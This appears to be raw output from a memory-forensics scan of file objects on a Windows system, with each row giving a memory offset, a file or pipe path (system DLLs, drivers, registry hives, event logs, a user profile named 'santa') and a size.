+0x918b74bc31b0	\Windows\System32\gmsaclient.dll	216
+0x918b74bc3340	\Windows\Fonts\segoeuisl.ttf	216
+0x918b74bc34d0	\Windows\System32\msv1_0.dll	216
+0x918b74bc3660	\Windows\System32\netlogon.dll	216
+0x918b74bc37f0	\$Directory	216
+0x918b74bc3980	\Windows\debug\PASSWD.LOG	216
+0x918b74bc3b10	\$Directory	216
+0x918b74bc3ca0	\Windows\System32\rsaenh.dll	216
+0x918b74bc3e30	\Windows\System32\C_28591.NLS	216
+0x918b74bc4150	\Windows\System32\dnsapi.dll	216
+0x918b74bc4470	\ntsvcs	216
+0x918b74bc4600	\Windows\System32\scesrv.dll	216
+0x918b74bc4790	\Windows\System32\svchost.exe	216
+0x918b74bc4ab0	\ntsvcs	216
+0x918b74bc4c40	\Windows\System32\scecli.dll	216
+0x918b74bc4dd0	\$Directory	216
+0x918b74bc50f0	\scerpc	216
+0x918b74bc5280	\Windows\System32\authz.dll	216
+0x918b74bc5410	\Windows\System32\ntmarta.dll	216
+0x918b74bc55a0	\Windows\System32\slc.dll	216
+0x918b74bc5730	\scerpc	216
+0x918b74bc58c0	\Windows\System32\umpo.dll	216
+0x918b74bc5a50	\$Directory	216
+0x918b74bc5be0	\Windows\System32\umpnpmgr.dll	216
+0x918b74bc5d70	\Windows\System32\sppc.dll	216
+0x918b74bc6090	\Windows\System32\umpoext.dll	216
+0x918b74bc6220	\Windows\System32	216
+0x918b74bc63b0	\Users\santa\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	216
+0x918b74bc6540	\Windows\System32\kdcpw.dll	216
+0x918b74bc66d0	\Windows\System32\en-US\services.exe.mui	216
+0x918b74bc6860	\ntsvcs	216
+0x918b74bc69f0	\scerpc	216
+0x918b74bc6b80	\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.32530.0_x64__8wekyb3d8bbwe\msvcp140.dll	216
+0x918b74bc6d10	\Windows\System32\WUDFPlatform.dll	216
+0x918b74bc71c0	\Windows\System32\profext.dll	216
+0x918b74bc7350	\Windows\System32\tdh.dll	216
+0x918b74bc74e0	\Windows\System32\dxgi.dll	216
+0x918b74bc7670	\Windows\servicing\TrustedInstaller.exe	216
+0x918b74bc7800	\Windows\System32\fontdrvhost.exe	216
+0x918b74bc7990	\Windows\System32\mintdh.dll	216
+0x918b74bc7b20	\Sessions\1\AppContainerNamedObjects\S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523	216
+0x918b74bc8160	\Sessions\0\AppContainerNamedObjects\S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523	216
+0x918b74bc82f0	\Windows\System32\fontdrvhost.exe	216
+0x918b74bc8480	\Windows\System32	216
+0x918b74bc8610	\$Directory	216
+0x918b74bc87a0	\Windows\System32	216
+0x918b74bc8c50	\Windows\System32\fwbase.dll	216
+0x918b74bc9270	\Windows\System32	216
+0x918b74bc9400	\Windows\System32\RpcRtRemote.dll	216
+0x918b74bc9590	\Windows\System32\umpo-overrides.dll	216
+0x918b74bc9720	\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms	216
+0x918b74bc98b0	\$Directory	216
+0x918b74bc9a40	\CMApi	216
+0x918b74bc9bd0	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db	216
+0x918b74bc9d60	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b74bc9ef0	\CMNotify	216
+0x918b74bca080	\CMNotify	216
+0x918b74bca210	\Windows\ServiceProfiles\NetworkService\NTUSER.DAT	216
+0x918b74bca530	\Windows\System32\gpapi.dll	216
+0x918b74bca850	\Device\HarddiskVolume4\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b74bca9e0	\Windows\System32\RpcEpMap.dll	216
+0x918b74bcab70	\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms	216
+0x918b74bcad00	\Windows\ServiceProfiles\NetworkService\NTUSER.DAT.LOG1	216
+0x918b74bcae90	\Device\HarddiskVolume4\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b74bcb1b0	\Windows\ServiceProfiles\NetworkService\NTUSER.DAT.LOG2	216
+0x918b74bcb340	\Windows\System32\hid.dll	216
+0x918b74bcb4d0	\$Directory	216
+0x918b74bcb660	\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM.blf	216
+0x918b74bcb7f0	\Windows\System32\DXCore.dll	216
+0x918b74bcb980	\Windows\System32\en-US\Windows.Graphics.dll.mui	216
+0x918b74bcbb10	\Windows\System32\SleepStudy\UserNotPresentSession.etl	216
+0x918b74bcbca0	\Windows\System32\svchost.exe	216
+0x918b74bcbe30	\Windows\Fonts\vgasys.fon	216
+0x918b74bcc150	\CMNotify	216
+0x918b74bcc2e0	\epmapper	216
+0x918b74bcc470	\Endpoint	216
+0x918b74bcc600	\Endpoint	216
+0x918b74bcc790	\Winsock2\CatalogChangeListener-260-0	216
+0x918b74bcc920	\Endpoint	216
+0x918b74bccab0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b74bccc40	\epmapper	216
+0x918b74bccdd0	\Endpoint	216
+0x918b74bcd0f0	\Endpoint	216
+0x918b74bcd280	\Endpoint	216
+0x918b74bcd410	\Endpoint	216
+0x918b74bcd5a0	\Endpoint	216
+0x918b74bcd730	\Endpoint	216
+0x918b74bcda50	\epmapper	216
+0x918b74bcdbe0	\Endpoint	216
+0x918b74bcdd70	\Endpoint	216
+0x918b74bce090	\Endpoint	216
+0x918b74bce220	\Winsock2\CatalogChangeListener-1dc-0	216
+0x918b74bce3b0	\Winsock2\CatalogChangeListener-318-0	216
+0x918b74bce540	\Windows\System32\wshqos.dll	216
+0x918b74bce6d0	\Endpoint	216
+0x918b74bce860	\Windows\System32	216
+0x918b74bce9f0	\Windows\System32\psmsrv.dll	216
+0x918b74bceb80	\Endpoint	216
+0x918b74bced10	\Endpoint	216
+0x918b74bceea0	\Windows\System32\rpcss.dll	216
+0x918b74bcf1c0	\Endpoint	216
+0x918b74bcf350	\Endpoint	216
+0x918b74bcf4e0	\$Directory	216
+0x918b74bcf670	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b74bcf800	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b74bcf990	\$Directory	216
+0x918b74bcfb20	\$Directory	216
+0x918b74bcfcb0	\Windows\System32\en-US\windows.ui.xaml.dll.mui	216
+0x918b74bcfe40	\Windows\Globalization\ICU\zoneinfo64.res	216
+0x918b74bd0160	\Reference	216
+0x918b74bd02f0	\Windows\System32\PlayToDevice.dll	216
+0x918b74bd0480	\Windows\Fonts\seguisb.ttf	216
+0x918b74bd0610	\Windows\Fonts\trebucbd.ttf	216
+0x918b74bd07a0	\Server	216
+0x918b74bd0930	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	216
+0x918b74bd0960	স璽醋￿স璽醋￿	0
+0x918b74bd0ac0	\Windows\System32\conhost.exe	216
+0x918b74bd0c50	\$Directory	216
+0x918b74bd0de0	\Connect	216
+0x918b752020e0	\LSM_API_service	216
+0x918b75202270	\Windows\System32\wer.dll	216
+0x918b75202590	\Windows\System32\dwm.exe	216
+0x918b752028b0	\CMNotify	216
+0x918b75202a40	\Windows\System32\dwmredir.dll	216
+0x918b75202bd0	\Windows\Fonts\marlett.ttf	216
+0x918b75202d60	\Windows\System32\lsm.dll	216
+0x918b75202ef0	\Windows\System32\dwminit.dll	216
+0x918b75203080	\LSM_API_service	216
+0x918b75203210	\Windows\System32\PsmServiceExtHost.dll	216
+0x918b752033a0	\Windows\System32\dwmapi.dll	216
+0x918b75203530	\Windows\System32\sysntfy.dll	216
+0x918b752036c0	\Windows\System32\UXInit.dll	216
+0x918b75203d00	\Windows\Fonts\micross.ttf	216
+0x918b75203e90	\Windows\System32\rmclient.dll	216
+0x918b752041b0	\Windows\System32\apphelp.dll	216
+0x918b75204340	\Windows\Resources\Themes\aero\aero.msstyles	216
+0x918b752044d0	\LSM_API_service	216
+0x918b752047f0	\Windows\System32	216
+0x918b75204980	\Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\startupCache\scriptCache-child-current.bin	216
+0x918b75204b10	\Windows\System32\uxtheme.dll	216
+0x918b75204ca0	\Windows\SysWOW64\npmproxy.dll	216
+0x918b75205150	\Windows\System32\bisrv.dll	216
+0x918b752052e0	\Windows\Registration\R000000000006.clb	216
+0x918b75205470	\Windows\System32\dcomp.dll	216
+0x918b75205600	\Windows\System32\d2d1.dll	216
+0x918b75205790	\Windows\System32\en-US\dwm.exe.mui	216
+0x918b75205920	\Windows\System32\dwmghost.dll	216
+0x918b75205ab0	\CMApi	216
+0x918b75205c40	\Windows\System32\twinapi.appcore.dll	216
+0x918b75205dd0	\Windows\System32\winmmbase.dll	216
+0x918b752060f0	\Windows\System32\d3d11.dll	216
+0x918b75206410	\Windows\System32\rpcss.dll	216
+0x918b75206730	\Windows\System32\D3DCompiler_47.dll	216
+0x918b752068c0	\Windows\System32\dsreg.dll	216
+0x918b75206be0	\Windows\System32\msvcp110_win.dll	216
+0x918b75206d70	\Windows\System32\ResourcePolicyClient.dll	216
+0x918b75207220	\Windows\System32\embeddedmodesvcapi.dll	216
+0x918b752073b0	\Windows\System32\d3d10warp.dll	216
+0x918b752076d0	\Windows\Registration\R000000000006.clb	216
+0x918b75207860	\Windows\System32\CoreMessaging.dll	216
+0x918b752079f0	\Windows\System32\winmm.dll	216
+0x918b75207d10	\Windows\System32\xmllite.dll	216
+0x918b75207ea0	\Windows\System32\dwmcore.dll	216
+0x918b752081c0	\Windows\System32\uDWM.dll	216
+0x918b75208350	\$Directory	216
+0x918b752084e0	\$Directory	216
+0x918b75208670	\Windows\System32\config\BBI.LOG2	216
+0x918b75208800	\Windows\System32\taskschd.dll	216
+0x918b75208990	\Windows\ServiceProfiles\LocalService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM.blf	216
+0x918b75208b20	\Windows\ServiceProfiles\LocalService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms	216
+0x918b75208cb0	\Windows\System32\SystemEventsBrokerServer.dll	216
+0x918b75208e40	\Windows\System32\BrokerLib.dll	216
+0x918b75209160	\Windows\ServiceProfiles\LocalService\NTUSER.DAT.LOG1	216
+0x918b752092f0	\Windows\System32\ResourcePolicyServer.dll	216
+0x918b75209480	\Windows\Fonts	216
+0x918b75209610	\Windows\System32\config\BBI	216
+0x918b752097a0	\Windows\System32\dabapi.dll	216
+0x918b75209930	\Windows\ServiceProfiles\LocalService\NTUSER.DAT.LOG2	216
+0x918b75209ac0	\Windows\System32\config\BBI.LOG1	216
+0x918b75209c50	\Windows\System32\shacct.dll	216
+0x918b75209de0	\Windows\ServiceProfiles\LocalService\NTUSER.DAT	216
+0x918b75282150	\Windows\System32\LogFiles\WMI\RtBackup\EtwRTDiagtrack-Listener.etl	216
+0x918b75282710	\Windows\System32\drivers\condrv.sys	216
+0x918b752c38f0	\$PrepareToShrinkFileSize	216
+0x918b752c5ce0	\Windows\System32\drivers\cldflt.sys	216
+0x918b752c7550	\Windows\System32\drivers\wcifs.sys	216
+0x918b752c8970	\Windows\System32\drivers\luafv.sys	216
+0x918b752c9d90	\Windows\System32\drivers\storqosflt.sys	216
+0x918b7538a0e0	\CMNotify	216
+0x918b7538a270	\CMNotify	216
+0x918b7538a400	\Windows\System32\svchost.exe	216
+0x918b7538a590	\Windows\System32\svchost.exe	216
+0x918b7538a8b0	\Windows\System32	216
+0x918b7538aa40	\Windows\System32	216
+0x918b7538ad60	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b7538aef0	\Windows\System32\lmhsvc.dll	216
+0x918b7538b210	\Device\HarddiskVolume4\Windows\ServiceProfiles\LocalService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b7538b530	\Windows\ServiceProfiles\LocalService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms	216
+0x918b7538b6c0	\Windows\System32\nrpsrv.dll	216
+0x918b7538b850	\Windows\System32\gpsvc.dll	216
+0x918b7538b9e0	\Windows\System32	216
+0x918b7538bb70	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b7538bd00	\CMNotify	216
+0x918b7538be90	\Windows\System32\nlaapi.dll	216
+0x918b7538c1b0	\$Directory	216
+0x918b7538c340	\Windows\System32\svchost.exe	216
+0x918b7538c4d0	\Windows\System32	216
+0x918b7538c660	\Windows\System32\dsrole.dll	216
+0x918b7538c7f0	\Windows\Fonts\trebucit.ttf	216
+0x918b7538cb10	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b7538cca0	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b7538ce30	\Device\HarddiskVolume4\Windows\ServiceProfiles\LocalService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b7538d150	\Windows\System32\svchost.exe	216
+0x918b7538d2e0	\CMNotify	216
+0x918b7538d470	\CMNotify	216
+0x918b7538d600	\Windows\System32\WinTypes.dll	216
+0x918b7538d790	\Windows\System32\Windows.Devices.Radios.dll	216
+0x918b7538d920	\Windows\System32\httpprxc.dll	216
+0x918b7538dab0	\CMNotify	216
+0x918b7538dc40	\CMNotify	216
+0x918b7538ddd0	\CMNotify	216
+0x918b7538e0f0	\CMNotify	216
+0x918b7538e410	\Windows\System32\avrt.dll	216
+0x918b7538e5a0	\CMNotify	216
+0x918b7538e730	\CMNotify	216
+0x918b7538e8c0	\CMNotify	216
+0x918b7538ea50	\CMNotify	216
+0x918b7538ebe0	\CMNotify	216
+0x918b7538ed70	\CMNotify	216
+0x918b7538f090	\Windows\System32\bi.dll	216
+0x918b7538f220	\Windows\System32\ncbservice.dll	216
+0x918b7538f3b0	\Windows\System32\propsys.dll	216
+0x918b7538f540	\CMNotify	216
+0x918b7538f6d0	\Endpoint	216
+0x918b7538f9f0	\Windows\System32\SystemEventsBrokerClient.dll	216
+0x918b7538fb80	\Windows\System32\ISM.dll	216
+0x918b7538fea0	\Windows\System32\ninput.dll	216
+0x918b753901c0	\Windows\System32\CoreUIComponents.dll	216
+0x918b75390350	\CMApi	216
+0x918b753904e0	\CMNotify	216
+0x918b75390670	\CMNotify	216
+0x918b75390800	\Windows\Registration\R000000000006.clb	216
+0x918b75390990	\CMNotify	216
+0x918b75390b20	\CMNotify	216
+0x918b75390cb0	\Windows\System32\BthRadioMedia.dll	216
+0x918b75390e40	\CMNotify	216
+0x918b75391160	\CMNotify	216
+0x918b753912f0	\CMNotify	216
+0x918b75391480	\CMNotify	216
+0x918b75391610	\CMNotify	216
+0x918b75391930	\Windows\Registration\R000000000006.clb	216
+0x918b75391ac0	\CMNotify	216
+0x918b75391c50	\Windows\System32\BluetoothApis.dll	216
+0x918b75391de0	\CMNotify	216
+0x918b753a60e0	\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\dosvcState.dat.LOG1	216
+0x918b753a6270	\Windows\System32\netprofm.dll	216
+0x918b753a6400	\Windows\System32\wtsapi32.dll	216
+0x918b753a6590	\CMNotify	216
+0x918b753a6720	\Program Files (x86)\Mozilla Firefox	216
+0x918b753a68b0	\Windows\Registration\R000000000006.clb	216
+0x918b753a6a40	\Windows\System32\svchost.exe	216
+0x918b753a6bd0	\Windows\System32\wevtsvc.dll	216
+0x918b753a6ef0	\$Directory	216
+0x918b753a7080	\CMApi	216
+0x918b753a7210	\CMNotify	216
+0x918b753a73a0	\Windows\System32\PortableDeviceApi.dll	216
+0x918b753a76c0	\CMNotify	216
+0x918b753a7850	\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\dosvcState.dat	216
+0x918b753a7b70	\CMNotify	216
+0x918b753a7d00	\Windows\System32	216
+0x918b753a7e90	\Windows\System32\SEMgrSvc.dll	216
+0x918b753a81b0	\Users\santa\AppData\Local\Comms\UnistoreDB\USS.jtx	216
+0x918b753a8660	\CMNotify	216
+0x918b753a8980	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b753a8ca0	\Windows\System32\en-US\dosvc.dll.mui	216
+0x918b753a8e30	\Windows\System32\UserDataTimeUtil.dll	216
+0x918b753a9150	\Program Files (x86)\Mozilla Firefox	216
+0x918b753a92e0	\Windows\System32\AudioSrvPolicyManager.dll	216
+0x918b753a9470	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b753a9600	\Windows\System32\MrmDeploy.dll	216
+0x918b753a9790	\Windows\System32\sysmain.dll	216
+0x918b753a9920	\Windows\System32\msdtcVSp1res.dll	216
+0x918b753a9ab0	\Windows\System32\cryptngc.dll	216
+0x918b753a9c40	\Windows\System32\svchost.exe	216
+0x918b753a9dd0	\Windows\System32\ubpm.dll	216
+0x918b753aa0f0	\Windows\System32	216
+0x918b753aa730	\Windows\System32\wmiclnt.dll	216
+0x918b753aa8c0	\Windows\System32\profsvc.dll	216
+0x918b753aaa50	\Windows\System32\samlib.dll	216
+0x918b753aabe0	\Windows\System32\wkscli.dll	216
+0x918b753aad70	\Windows\System32\profsvcext.dll	216
+0x918b753ab090	\Windows\System32\es.dll	216
+0x918b753ab220	\Windows\SysWOW64\wship6.dll	216
+0x918b753ab3b0	\Windows\System32\logoncli.dll	216
+0x918b753ab540	\Windows\System32\appsruprov.dll	216
+0x918b753ab9f0	\CMApi	216
+0x918b753abb80	\Windows\System32\usermgrcli.dll	216
+0x918b753abd10	\Windows\System32\schedsvc.dll	216
+0x918b753ac4e0	\Windows\System32\Windows.Gaming.Input.dll	216
+0x918b753ac670	\Windows\System32\themeservice.dll	216
+0x918b753ac800	\Windows\System32\wincorlib.dll	216
+0x918b753ac990	\Windows\System32\AudioEndpointBuilder.dll	216
+0x918b753accb0	\Windows\System32\WindowsCodecs.dll	216
+0x918b753ad160	\$Directory	216
+0x918b753ad610	\Windows\System32\FontProvider.dll	216
+0x918b753ad930	\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-FontFace.dat	216
+0x918b753adac0	\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-System.dat	216
+0x918b753adc50	\Windows\System32\FntCache.dll	216
+0x918b753adde0	\Windows\System32\policymanager.dll	216
+0x918b754ab100	\CMNotify	216
+0x918b754ab420	\Windows\System32\winhttp.dll	216
+0x918b754ab5b0	\Winsock2\CatalogChangeListener-3f0-0	216
+0x918b754ab740	\Windows\System32\DispBroker.Desktop.dll	216
+0x918b754ab8d0	\Endpoint	216
+0x918b754aba60	\Endpoint	216
+0x918b754abbf0	\eventlog	216
+0x918b754abd80	\Windows\Registration\R000000000006.clb	216
+0x918b754ac0a0	\Endpoint	216
+0x918b754ac230	\CMNotify	216
+0x918b754ac3c0	\Windows\System32\OneCoreUAPCommonProxyStub.dll	216
+0x918b754ac550	\Endpoint	216
+0x918b754ac6e0	\Windows\System32\coloradapterclient.dll	216
+0x918b754ac870	\eventlog	216
+0x918b754aca00	\CMNotify	216
+0x918b754acb90	\eventlog	216
+0x918b754acd20	\Windows\System32\UIAnimation.dll	216
+0x918b754ad1d0	\Windows\System32\MMDevAPI.dll	216
+0x918b754ad680	\Windows\System32\mscms.dll	216
+0x918b754ad810	\Windows\System32\wevtapi.dll	216
+0x918b754ad9a0	\CMApi	216
+0x918b754adb30	\CMApi	216
+0x918b754adcc0	\Windows\Registration\R000000000006.clb	216
+0x918b754ade50	\CMNotify	216
+0x918b754ae170	\Windows\System32\actxprxy.dll	216
+0x918b754ae490	\Windows\System32\audiosrv.dll	216
+0x918b754ae620	\Windows\System32\winnsi.dll	216
+0x918b754ae940	\Windows\System32\svchost.exe	216
+0x918b754aead0	\Windows\System32\en-US\AudioEndpointBuilder.dll.mui	216
+0x918b754aec60	\Windows\System32\netjoin.dll	216
+0x918b754af110	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b754af2a0	\Windows\System32\dhcpcore.dll	216
+0x918b754af430	\Windows\System32\dhcpcsvc.dll	216
+0x918b754af5c0	\Windows\System32\nlasvc.dll	216
+0x918b754af8e0	\Windows\System32\dnsrslvr.dll	216
+0x918b754afc00	\Windows\System32\DispBroker.dll	216
+0x918b754afd90	\Windows\System32\Sens.dll	216
+0x918b754b00b0	\Windows\System32\nsisvc.dll	216
+0x918b754b0240	\CMNotify	216
+0x918b754b03d0	\Windows\System32	216
+0x918b754b0560	\Windows\System32\dhcpcsvc6.dll	216
+0x918b754b06f0	\Windows\System32\wshhyperv.dll	216
+0x918b754b0880	\Windows\System32\ncsi.dll	216
+0x918b754b0a10	\Windows\System32\ssdpapi.dll	216
+0x918b754b0ba0	\CMNotify	216
+0x918b754b0d30	\$Directory	216
+0x918b754b0ec0	\Windows\System32\dhcpcore6.dll	216
+0x918b754b11e0	\Windows\System32\winevt\Logs\System.evtx	216
+0x918b754b1370	\Windows\System32\taskcomp.dll	216
+0x918b754b1690	\Windows\System32\winevt\Logs\Security.evtx	216
+0x918b754b19b0	\Windows\System32\drivers\etc	216
+0x918b754b1b40	\Endpoint	216
+0x918b754b1cd0	\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx	216
+0x918b754b1e60	\Windows\System32\winevt\Logs\Application.evtx	216
+0x918b754b2180	\Windows\System32\Windows.Graphics.dll	216
+0x918b754b2310	\Dev\Query	216
+0x918b754b24a0	\CMNotify	216
+0x918b754b27c0	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b754b2c70	\Endpoint	216
+0x918b754b2e00	\$Directory	216
+0x918b754b3120	\CMNotify	216
+0x918b754b32b0	\Dev\Query	216
+0x918b754b3440	\Windows\System32\svchost.exe	216
+0x918b754b35d0	\SwDevice	216
+0x918b754b38f0	\Windows\System32\FWPUCLNT.DLL	216
+0x918b754b3a80	\Windows\System32	216
+0x918b754b3da0	\Endpoint	216
+0x918b754b4250	\CMNotify	216
+0x918b754b43e0	\Windows\System32\en-US\d2d1.dll.mui	216
+0x918b754b4570	\CMNotify	216
+0x918b754b4700	\Windows\System32\winevt\Logs\Internet Explorer.evtx	216
+0x918b754b4890	\Windows\System32\shsvcs.dll	216
+0x918b754b4a20	\Windows\System32\winevt\Logs\HardwareEvents.evtx	216
+0x918b754b4bb0	\Windows\System32\AudioSes.dll	216
+0x918b754b4ed0	\atsvc	216
+0x918b754b5510	\Windows\System32\wlanapi.dll	216
+0x918b754b5830	\CMNotify	216
+0x918b754b59c0	\atsvc	216
+0x918b754b5b50	\Windows\Tasks	216
+0x918b754b5ce0	\atsvc	216
+0x918b754b5e70	\Windows\Registration\R000000000006.clb	216
+0x918b754b6190	\Windows\System32\winevt\Logs\Key Management Service.evtx	216
+0x918b754b6320	\Windows\System32\usermgr.dll	216
+0x918b754b64b0	\Windows\System32\en-US\netprofmsvc.dll.mui	216
+0x918b754b6640	\Windows\System32\winevt\Logs\Windows PowerShell.evtx	216
+0x918b754b67d0	\Windows\System32\netprofmsvc.dll	216
+0x918b754b6c80	\Windows\System32\MrmCoreR.dll	216
+0x918b754b7130	\CMApi	216
+0x918b754b72c0	\Windows\System32\Windows.UI.dll	216
+0x918b754b7450	\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx	216
+0x918b754b75e0	\Windows\System32\BCP47Langs.dll	216
+0x918b754b7770	\Windows\System32\cabinet.dll	216
+0x918b754b7900	\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx	216
+0x918b754b7a90	\Windows\System32	216
+0x918b754b7db0	\Windows\System32\mstask.dll	216
+0x918b754b80d0	\Windows\System32\svchost.exe	216
+0x918b754b8260	\Windows\System32\InputHost.dll	216
+0x918b754b83f0	\Windows\System32\wcmsvc.dll	216
+0x918b754b8580	\CMApi	216
+0x918b754b8710	\Windows\System32\mobilenetworking.dll	216
+0x918b754b8ee0	\Windows\System32\radardt.dll	216
+0x918b754b9200	\Windows\System32\svchost.exe	216
+0x918b754b96b0	\Windows\System32\spoolsv.exe	216
+0x918b754b9840	\Windows\System32\OnDemandConnRouteHelper.dll	216
+0x918b754b99d0	\Windows\System32\coreaudiopolicymanagerext.dll	216
+0x918b754b9b60	\Windows\System32\FamilySafetyExt.dll	216
+0x918b754b9cf0	\Windows\System32\samcli.dll	216
+0x918b754b9e80	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b754ba1a0	\Windows\System32	216
+0x918b754ba330	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b754ba4c0	\Windows\System32\dusmsvc.dll	216
+0x918b754ba650	\CMNotify	216
+0x918b754ba7e0	\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx	216
+0x918b754bab00	\CMNotify	216
+0x918b754bac90	\Windows\Registration\R000000000006.clb	216
+0x918b754bae20	\Windows\System32\en-US\gpsvc.dll.mui	216
+0x918b75561670	\Windows\System32\drivers\lltdio.sys	216
+0x918b75561ac0	\$PrepareToShrinkFileSize	216
+0x918b75562080	\$PrepareToShrinkFileSize	216
+0x918b755634a0	\Windows\System32\drivers\mslldp.sys	216
+0x918b755638f0	\SystemRoot\System32\Config\TxR\{fd9a35aa-49fe-11e9-aa2c-248a07783950}.TxR	216
+0x918b75564470	\Windows\System32\config\TxR\{fd9a35aa-49fe-11e9-aa2c-248a07783950}.TxR.blf	216
+0x918b75565a00	\Windows\System32\drivers\rspndr.sys	216
+0x918b75565e50	\Windows\System32\drivers\http.sys	216
+0x918b75567100	\Windows\System32\drivers\winquic.sys	216
+0x918b755673e0	\Windows\System32\config\TxR\{fd9a35aa-49fe-11e9-aa2c-248a07783950}.TxR.0.regtrans-ms	216
+0x918b75567550	\Windows\System32\config\TxR\{fd9a35aa-49fe-11e9-aa2c-248a07783950}.TxR.2.regtrans-ms	216
+0x918b75568240	\Windows\System32\config\TxR\{fd9a35aa-49fe-11e9-aa2c-248a07783950}.TxR.1.regtrans-ms	216
+0x918b7556c460	\Windows\System32\drivers\mrxsmb.sys	216
+0x918b7556d5a0	\Windows\System32\drivers\bowser.sys	216
+0x918b75616100	\Windows\System32\winevt\Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx	216
+0x918b75616290	\Windows\System32\CSystemEventsBrokerClient.dll	216
+0x918b756165b0	\Windows\System32	216
+0x918b75616740	\Windows\System32	216
+0x918b756168d0	\Windows\Fonts\segoeuib.ttf	216
+0x918b75616a60	\Dev\Query	216
+0x918b75616bf0	\CMNotify	216
+0x918b756170a0	\Windows\System32	216
+0x918b75617230	\Windows\System32\fveapi.dll	216
+0x918b756173c0	\Windows\System32\TimeBrokerClient.dll	216
+0x918b756176e0	\Windows\System32\en-US\spoolsv.exe.mui	216
+0x918b75617870	\CMApi	216
+0x918b75617a00	\CMNotify	216
+0x918b75617b90	\Windows\System32\svchost.exe	216
+0x918b75617d20	\Windows\System32\urlmon.dll	216
+0x918b75617eb0	\spoolss	216
+0x918b756181d0	\Windows\System32\BFE.DLL	216
+0x918b75618360	\CMNotify	216
+0x918b756184f0	\Windows\System32\svchost.exe	216
+0x918b75618680	\CMNotify	216
+0x918b75618810	\Windows\System32\winevt\Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx	216
+0x918b756189a0	\Windows\System32\Windows.StateRepository.dll	216
+0x918b75618b30	\CMNotify	216
+0x918b75618cc0	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b75619170	\Windows\System32\PCPKsp.dll	216
+0x918b75619300	\spoolss	216
+0x918b75619490	\Windows\Registration\R000000000006.clb	216
+0x918b75619940	\Windows\SoftwareDistribution\DataStore\Logs\edb.loglog	216
+0x918b75619ad0	\Windows\System32\StateRepository.Core.dll	216
+0x918b75619c60	\Windows\System32\en-US\bfe.dll.mui	216
+0x918b7561a110	\Endpoint	216
+0x918b7561a2a0	\Windows\System32\TimeBrokerServer.dll	216
+0x918b7561a5c0	\$Directory	216
+0x918b7561aa70	\$Directory	216
+0x918b7561ac00	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b7561ad90	\Endpoint	216
+0x918b7561b3d0	\spoolss	216
+0x918b7561b560	\Windows\System32\AppXDeploymentClient.dll	216
+0x918b7561b6f0	\Windows\System32	216
+0x918b7561b880	\Windows\System32\capauthz.dll	216
+0x918b7561ba10	\Windows\System32\LanguageOverlayUtil.dll	216
+0x918b7561bba0	\Endpoint	216
+0x918b7561bd30	\Winsock2\CatalogChangeListener-5e8-0	216
+0x918b7561bec0	\Endpoint	216
+0x918b7561c1e0	\Windows\System32\BCP47mrm.dll	216
+0x918b7561c370	\CMNotify	216
+0x918b7561c500	\Windows\System32\wkssvc.dll	216
+0x918b7561c690	\wkssvc	216
+0x918b7561c820	\Windows\System32\dsparse.dll	216
+0x918b7561c9b0	\wkssvc	216
+0x918b7561cb40	\Windows\System32\rasadhlp.dll	216
+0x918b7561ce60	\CMApi	216
+0x918b7561d310	\Windows\System32\en-US\Windows.UI.Immersive.dll.mui	216
+0x918b7561d4a0	\Windows\System32\cmintegrator.dll	216
